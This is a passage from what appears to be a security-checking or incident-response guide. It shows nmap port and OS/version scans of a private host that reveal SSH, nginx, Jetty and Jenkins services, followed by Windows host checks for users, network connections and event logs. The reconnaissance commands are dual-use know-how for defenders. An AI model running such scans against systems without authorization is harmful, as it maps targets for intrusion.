PORT   STATE    SERVICE
80/tcp filtered http

Nmap scan report for 192.168.26.55
Host is up (latency).

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 256 IP addresses (2 hosts up) scanned in 18.83 seconds

Scan the status of TCP ports 53-55 and 25

# nmap -n 192.168.26.55 -p 53-55,25
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 19:37 CST
Nmap scan report for 192.168.26.55
Host is up (0.00098s latency).

PORT   STATE  SERVICE
25/tcp closed smtp
53/tcp closed domain
54/tcp closed xns-ch
55/tcp closed isi-gl

Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Combined scan: operating system fingerprint and software versions

# nmap -n -A 192.168.26.55
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-03 19:27 CST
Nmap scan report for 192.168.26.55
Host is up (0.00087s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)            # port 22 open, running OpenSSH 7.4
| ssh-hostkey:
|   2048 5b:40:0e:e6:1d:70:7f:f1:05:34:8d:2b:72:a1:c5:b3 (RSA)
|_  256 f1:27:ee:82:cc:94:b2:7c:68:c9:ea:a0:88:64:20:b3 (ECDSA)
80/tcp    open  http    nginx                                 # port 80 open, HTTP served by nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
222/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 03:b8:32:59:ad:e7:9c:... (ED25519)
8080/tcp  open  http    Jetty 9.4.43.v20210629
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
50000/tcp open  http    Jenkins httpd 2.319                   # port 50000 open, HTTP served by Jenkins
|_http-title: Site doesn't have a title (text/plain; charset=UTF-8).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=3/3%OT=22%CT=1%CU=36908%PV=Y%DS=2%DC=T%G=Y%TM=6220A6BE
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=A)SEQ(
OS:SP=102%GCD=1%ISR=10C%TI=Z%TS=A)SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=I%TS=A)O
OS:PS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4S
OS:T11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)E
OS:CN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8E44%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 6002/tcp)
HOP RTT     ADDRESS
1   0.32 ms 172.24.208.1
2   0.77 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.45 seconds

Windows Operating System

System screening

Check user information with net users, or via Computer Management -> Local Users and Groups; look for cloned users in the registry

D:\>net users

User accounts for \\LIRUILONG

-------------------------------------------------------------------------------
__HSKDDNS_USER__         Administrator            DefaultAccount
Guest                    Lenovo                   WDAGUtilityAccount
The command completed successfully.

Network connection check: netstat -ano, look for suspicious network connections

D:\>netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       1116
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       8036
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  .......
  TCP    192.168.1.5:2384       112.86.128.91:443      ESTABLISHED     14184
  TCP    192.168.1.5:2386       112.86.128.91:443      ESTABLISHED     14184
  TCP    192.168.1.5:2413       112.86.128.91:443      ESTABLISHED     14184
  TCP    192.168.1.5:2415       112.86.128.91:443      ESTABLISHED     14184
  TCP    192.168.1.5:2511       124.238.121.41:80      CLOSE_WAIT      11696
  .......
  TCP    192.168.1.5:2523       113.96.237.36:443      CLOSE_WAIT      11696
  TCP    192.168.1.5:2524       113.96.237.36:443      CLOSE_WAIT      11696
  .......

Process check: Task Manager, look for suspicious processes

Scheduled task check: Task Scheduler, look for suspicious scheduled tasks

Service check: Task Manager -> Services

Log screening

System logs: by default, Windows stores its event logs under %SystemRoot%\System32\Winevt\Logs.

  • Application.evtx (application log)
  • Security.evtx (security log)
  • System.evtx (system log)

You can use the built-in Event Viewer to read the security log.

PS C:\Windows\System32\winevt\Logs> ls C:\Windows\System32\winevt\Logs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2022/3/3     15:46       20975616 Application.evtx
-a----        2021/2/17     16:02          69632 HardwareEvents.evtx
-a----        2021/2/17     16:02          69632 Internet Explorer.evtx
-a----        2021/2/17     16:02          69632 Key Management Service.evtx
-a----        2022/2/25     21:42        1118208 Lenovo-Power-BaseModule%4Operational.evtx
-a----         2021/4/9      8:23          69632 Microsoft-AppV-Client%4Admin.evtx
-a----         2021/4/9      8:23          69632 Microsoft-AppV-Client%4Operational.evtx
-a----         2021/4/9      8:23          69632 Microsoft-AppV-Client%4Virtual Applications.evtx
............................